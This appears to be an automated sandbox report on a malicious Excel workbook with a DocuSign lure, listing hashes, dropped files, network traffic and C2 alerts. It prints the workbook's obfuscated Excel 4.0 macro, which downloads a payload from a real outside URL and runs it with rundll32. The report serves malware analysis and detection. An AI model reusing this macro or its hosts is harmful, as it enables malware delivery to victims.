File Type: | |
Category: | downloaded |
Size (bytes): | 4591104 |
Entropy (8bit): | 5.0540147937501265 |
Encrypted: | false |
SSDEEP: | 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9 |
MD5: | 25056DF6D3546DE971EAFE5DA5F9AE44 |
SHA1: | 179555B3D0391E45DF29E651B8ED0342D02FE88A |
SHA-256: | AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB |
SHA-512: | 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Reputation: | moderate, very likely benign file |
IE Cache URL: | http://www.chipmania.it/mails/open.php |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 155530 |
Entropy (8bit): | 7.660528560276826 |
Encrypted: | false |
SSDEEP: | 3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXJ:YEGSzx0dmxk7RbsYsKtseoX5 |
MD5: | 580CA80638F8E187610170B9B916F1A6 |
SHA1: | 22C0E7E4869EFBBBB899C07C501F360B76A9BCD6 |
SHA-256: | 259129D6D4838E991E927B042A0460F61ABB90E78E833EFDF5F832339A9246CC |
SHA-512: | EDDC6C12D8E303A5937B21F0DFB02E4708A16CB57FAED8E206EA8815D239E84D8E405FDB32232A1E0054BDD9562D962AE35139953FA77942BEC8F5285F6FAC6F |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 59134 |
Entropy (8bit): | 7.995450161616763 |
Encrypted: | true |
SSDEEP: | 1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk |
MD5: | E92176B0889CC1BB97114BEB2F3C1728 |
SHA1: | AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443 |
SHA-256: | 58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3 |
SHA-512: | CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | modified |
Size (bytes): | 152788 |
Entropy (8bit): | 6.316654432555028 |
Encrypted: | false |
SSDEEP: | 1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx |
MD5: | 64FEDADE4387A8B92C120B21EC61E394 |
SHA1: | 15A2673209A41CCA2BC3ADE90537FE676010A962 |
SHA-256: | BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745 |
SHA-512: | 655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.46889222662012 |
Encrypted: | false |
SSDEEP: | 12:85Q5n1LgXg/XAlCPCHaXgzB8IB/PEGgX+Wnicvbf+bDtZ3YilMMEpxRljKITdJP8:85GP/XTwz6IkYeWDv3qhrNru/ |
MD5: | 779E4D79BFB6B9A90E65743AA9697FB2 |
SHA1: | DE951D26E777E72F62B2904EF5EA88F2B3963E65 |
SHA-256: | 286A3C533A8648DCE42D7089C2ED442E1A6B348F1320956C5D9F60D788C52581 |
SHA-512: | E0D8C5A51EDAC95856EA83344F369747E5FD8B68E5A7EC9FF7A14C28C86D2641CBE84B75F7D52D5B8035A5396DC671288F967F569FE56E8FF62960339EE89B49 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2368 |
Entropy (8bit): | 4.572683374026909 |
Encrypted: | false |
SSDEEP: | 48:8j/d/XT3I3HChveHCLhQh2j/d/XT3I3HChveHCLhQ/:8jl/XLI3ihLhQh2jl/XLI3ihLhQ/ |
MD5: | 2514DDDEF94E783EAAF46CEC52AA49BB |
SHA1: | 5244D1442A2CB863E75200CC1ED7AF6CCB947A9F |
SHA-256: | 13A5420DD8AC93A70A602CD2500697C31625BF764AD80A587CFE38CB9E5A41D6 |
SHA-512: | 21E12061C0D630EE11259A3C1B8D514E28718BAE1107D0B18C3F103395930B9DFDEDE6AD6A8A1E78AF198AC1570B598F31737B7A56F2A769A9371BE5F5EEF8BE |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 185 |
Entropy (8bit): | 4.876408116811588 |
Encrypted: | false |
SSDEEP: | 3:oyBVomM0bcsoMWgou4ouscbcsoMWgou4omM0bcsoMWgou4ov:dj60wsoMW+4VwsoMW+460wsoMW+4y |
MD5: | 53737609850FAE6F3241AABAB5206886 |
SHA1: | 5D98430F4BA269530B66CCE97C7CF6A7605BD3D2 |
SHA-256: | 4C6E65EC2DDC6544CDC21215319A360903C27178F5FBEC101D3B23EE8F74F098 |
SHA-512: | 074A0EE29DF75C11183AA51A38C97C8631EBFEB7852EB0F2B4A37D2FC775E9824ED14292D24D158719730FCF5129F01FF680C0E13B5EF88A5C50D9C0C5DCA7F4 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4591104 |
Entropy (8bit): | 5.0540147937501265 |
Encrypted: | false |
SSDEEP: | 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9 |
MD5: | 25056DF6D3546DE971EAFE5DA5F9AE44 |
SHA1: | 179555B3D0391E45DF29E651B8ED0342D02FE88A |
SHA-256: | AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB |
SHA-512: | 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 177025 |
Entropy (8bit): | 7.239945092303017 |
Encrypted: | false |
SSDEEP: | 3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2QnI:4cKoSsxzNDZLDZjlbR868O8KL5L+4iK0 |
MD5: | 284F711E4245DF9D1706EED70EB61B89 |
SHA1: | BB3DF0DAFA04AEA74F8C5768C3FDBF7710F470C3 |
SHA-256: | F9C84A4A89AA18C68EC569DA066C3D6B92872DBB85665184E3311123BB75608D |
SHA-512: | E5F0A769EA0FA2841B5AE77797D10D7540FB25F5464F4A4616BA9B63CEDC744581ABE365A6B14190A022824596F1397124C46B124F6C224B0096500732B74442 |
Malicious: | false |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.195176543915214 |
TrID: |
|
File name: | SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls |
File size: | 168960 |
MD5: | 7810830918f82b2acdcdb05d2d404bad |
SHA1: | 095201dab7b66c1268e3921356a2870ad1dc628c |
SHA256: | c217faa8b517c65418d18c7b14ccb3c307cdbd0b477a7d09332aad25dcd52d81 |
SHA512: | 0908d69aec61aa32b134105a897c98726c2817f18faef03cf855db0d1928c8022850efd7e4b5784ab51d2faf204cd5bcfe3785974ddfc8dc0871605083240253 |
SSDEEP: | 3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUM3:OcKoSsxzNDZLDZjlbR868O8KlVH3jiKy |
File Content Preview: | ........................>.......................H...........................E...F...G.......................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-02-19 10:48:36 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 917504 |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.357299206868 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e3 04 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.247217286775 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 157800 |
Entropy: | 7.46869820242 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . |
Data Raw: | 09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
"=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
02/20/21-03:20:19.152823 | TCP | 2404348 | ET CNC Feodo Tracker Reported CnC Server TCP group 25 | 49166 | 443 | 192.168.2.22 | 94.140.114.136 |
02/20/21-03:21:02.841833 | TCP | 2404306 | ET CNC Feodo Tracker Reported CnC Server TCP group 4 | 49168 | 443 | 192.168.2.22 | 142.202.191.164 |
02/20/21-03:21:05.665889 | TCP | 2404332 | ET CNC Feodo Tracker Reported CnC Server TCP group 17 | 49170 | 443 | 192.168.2.22 | 45.155.173.242 |
02/20/21-03:21:50.785864 | TCP | 2404324 | ET CNC Feodo Tracker Reported CnC Server TCP group 13 | 49173 | 443 | 192.168.2.22 | 200.52.147.93 |
02/20/21-03:22:15.668490 | TCP | 2404314 | ET CNC Feodo Tracker Reported CnC Server TCP group 8 | 49175 | 443 | 192.168.2.22 | 182.253.107.34 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 20, 2021 03:20:08.355906963 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.413467884 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.413587093 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.414331913 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.474250078 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.481328964 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.481429100 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.481479883 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.481518030 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.481558084 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.481574059 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.481597900 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.481610060 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.481630087 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.481636047 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.481659889 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.481674910 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.481714010 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.481718063 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.481760979 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.481762886 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.481779099 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.481812000 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.492059946 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.539288044 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.539355993 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.539396048 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.539438963 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.539478064 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.539500952 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.539526939 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.539537907 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.539544106 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.539549112 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.539571047 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.539593935 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.539609909 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.539634943 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.539649010 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.539689064 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.539702892 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.539715052 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.539727926 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.539743900 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.539767027 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.539788008 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.539805889 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.539829969 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.539854050 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.539897919 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.539904118 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.539912939 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.539935112 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.539958000 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.539974928 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.539998055 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.540013075 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.540030956 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.540050983 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.540076971 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.540091038 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.540107012 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.540149927 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.541318893 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.597528934 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.597590923 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.597634077 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.597673893 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.597676039 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.597703934 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.597707987 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.597712994 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.597724915 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.597753048 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.597764969 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.597790956 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.597803116 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.597830057 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.597841024 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.597868919 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.597879887 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.597915888 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.597920895 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.597958088 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.597970009 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.597996950 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.598009109 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.598036051 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.598047018 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.598074913 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.598087072 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.598113060 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.598124981 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.598151922 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.598164082 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.598191023 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.598202944 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.598238945 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 03:20:08.598261118 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 03:20:08.598306894 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 20, 2021 03:20:08.290577888 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 03:20:08.341211081 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 03:21:03.812624931 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 03:21:03.874272108 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 03:21:03.890100956 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 03:21:03.948726892 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 03:22:17.945517063 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 03:22:17.997308969 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 03:22:17.999011040 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 03:22:18.059031010 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Feb 20, 2021 03:20:08.290577888 CET | 192.168.2.22 | 8.8.8.8 | 0x2c09 | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 20, 2021 03:22:17.945517063 CET | 192.168.2.22 | 8.8.8.8 | 0x758f | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 20, 2021 03:22:17.999011040 CET | 192.168.2.22 | 8.8.8.8 | 0xa016 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Feb 20, 2021 03:20:08.341211081 CET | 8.8.8.8 | 192.168.2.22 | 0x2c09 | No error (0) | chipmania.it | CNAME (Canonical name) | IN (0x0001) | ||
Feb 20, 2021 03:20:08.341211081 CET | 8.8.8.8 | 192.168.2.22 | 0x2c09 | No error (0) | 185.81.0.78 | A (IP address) | IN (0x0001) | ||
Feb 20, 2021 03:22:17.997308969 CET | 8.8.8.8 | 192.168.2.22 | 0x758f | No error (0) | 176.58.123.25 | A (IP address) | IN (0x0001) | ||
Feb 20, 2021 03:22:18.059031010 CET | 8.8.8.8 | 192.168.2.22 | 0xa016 | No error (0) | 176.58.123.25 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 185.81.0.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 20, 2021 03:20:08.414331913 CET | 0 | OUT | |
Feb 20, 2021 03:20:08.481328964 CET | 2 | IN |